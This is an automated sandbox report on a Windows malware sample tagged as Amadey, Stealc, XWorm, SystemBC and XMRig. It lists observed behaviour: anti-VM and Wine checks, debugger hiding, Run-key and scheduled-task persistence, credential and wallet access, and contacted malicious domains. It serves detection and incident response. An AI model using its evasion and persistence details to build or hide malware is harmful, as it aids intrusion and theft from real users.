Malware Analysis Report

2025-04-03 09:24

Sample ID 250305-2jckjs1rx4
Target 001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066
SHA256 001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066
Tags
defense_evasion discovery spyware stealer amadey gcleaner healer stealc systembc xmrig xworm 092155 trump credential_access dropper execution loader miner persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066

Threat Level: Known bad

The file 001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066 was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery spyware stealer amadey gcleaner healer stealc systembc xmrig xworm 092155 trump credential_access dropper execution loader miner persistence rat trojan

xmrig

SystemBC

Stealc family

Stealc

Amadey

GCleaner

Detect Xworm Payload

Healer family

Healer

Xmrig family

Systembc family

Xworm

Detects Healer an antivirus disabler dropper

Xworm family

Gcleaner family

Amadey family

Identifies VirtualBox via ACPI registry values (likely anti-VM)

XMRig Miner payload

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Uses browser remote debugging

Checks BIOS information in registry

Reads user/profile data of local email clients

Checks computer location settings

Executes dropped EXE

Reads user/profile data of web browsers

Identifies Wine through registry keys

Drops startup file

Loads dropped DLL

Adds Run key to start application

Checks installed software on the system

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of NtSetInformationThreadHideFromDebugger

AutoIT Executable

Enumerates processes with tasklist

Suspicious use of SetThreadContext

Drops file in Windows directory

Program crash

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Unsigned PE

Browser Information Discovery

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Suspicious use of SetWindowsHookEx

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Delays execution with timeout.exe

Kills process with taskkill

Scheduled Task/Job: Scheduled Task

Suspicious use of WriteProcessMemory

Checks processor information in registry

Suspicious use of FindShellTrayWindow

Modifies registry class

Suspicious use of UnmapMainImage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-03-05 22:36

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-05 22:36

Reported

2025-03-05 22:38

Platform

win7-20240903-en

Max time kernel

120s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe"

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe N/A

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe

"C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 1212

Network

Country Destination Domain Proto
US 8.8.8.8:53 circujitstorm.bet udp
US 8.8.8.8:53 explorebieology.run udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 moderzysics.top udp
US 172.67.189.66:443 moderzysics.top tcp

Files

memory/2208-0-0x00000000000E0000-0x00000000003EF000-memory.dmp

memory/2208-1-0x00000000773B0000-0x00000000773B2000-memory.dmp

memory/2208-2-0x00000000000E1000-0x0000000000141000-memory.dmp

memory/2208-3-0x00000000000E0000-0x00000000003EF000-memory.dmp

memory/2208-4-0x00000000000E0000-0x00000000003EF000-memory.dmp

memory/2208-5-0x00000000000E0000-0x00000000003EF000-memory.dmp

memory/2208-6-0x00000000000E0000-0x00000000003EF000-memory.dmp

memory/2208-7-0x00000000000E1000-0x0000000000141000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2025-03-05 22:36

Reported

2025-03-05 22:38

Platform

win10v2004-20250217-en

Max time kernel

127s

Max time network

152s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Healer

dropper healer

Healer family

healer

Stealc

stealer stealc

Stealc family

stealc

SystemBC

trojan systembc

Systembc family

systembc

Xmrig family

xmrig

Xworm

trojan rat xworm

Xworm family

xworm

xmrig

miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\nxpsp\mcsq.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107530101\b26b6bfdcd.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107490101\339a55ae62.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107510101\5e644351a1.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107500101\83c5f6f0d5.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\RBCRUM6KVZ7YTYUB9QJUZBNP2C3075.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107460101\09a5b3d3db.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107480101\b945d3c333.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Uses browser remote debugging

credential_access stealer
Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107490101\339a55ae62.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107490101\339a55ae62.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107460101\09a5b3d3db.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107480101\b945d3c333.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107510101\5e644351a1.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107530101\b26b6bfdcd.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107530101\b26b6bfdcd.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\nxpsp\mcsq.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107510101\5e644351a1.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107500101\83c5f6f0d5.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107500101\83c5f6f0d5.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107460101\09a5b3d3db.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107480101\b945d3c333.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\RBCRUM6KVZ7YTYUB9QJUZBNP2C3075.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\nxpsp\mcsq.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\RBCRUM6KVZ7YTYUB9QJUZBNP2C3075.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\3277ecaa2a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107460101\09a5b3d3db.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107470101\c03b939485.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107470101\c03b939485.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107480101\b945d3c333.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107490101\339a55ae62.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\ProgramData\nxpsp\mcsq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107500101\83c5f6f0d5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107510101\5e644351a1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RBCRUM6KVZ7YTYUB9QJUZBNP2C3075.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107530101\b26b6bfdcd.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107530101\b26b6bfdcd.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107460101\09a5b3d3db.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107480101\b945d3c333.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\ProgramData\nxpsp\mcsq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107500101\83c5f6f0d5.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107490101\339a55ae62.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107510101\5e644351a1.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\RBCRUM6KVZ7YTYUB9QJUZBNP2C3075.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107450121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\83c5f6f0d5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107500101\\83c5f6f0d5.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5e644351a1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107510101\\5e644351a1.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8c305bd773.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107520101\\8c305bd773.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3277ecaa2a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107440101\\3277ecaa2a.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107500101\83c5f6f0d5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107530101\b26b6bfdcd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe N/A
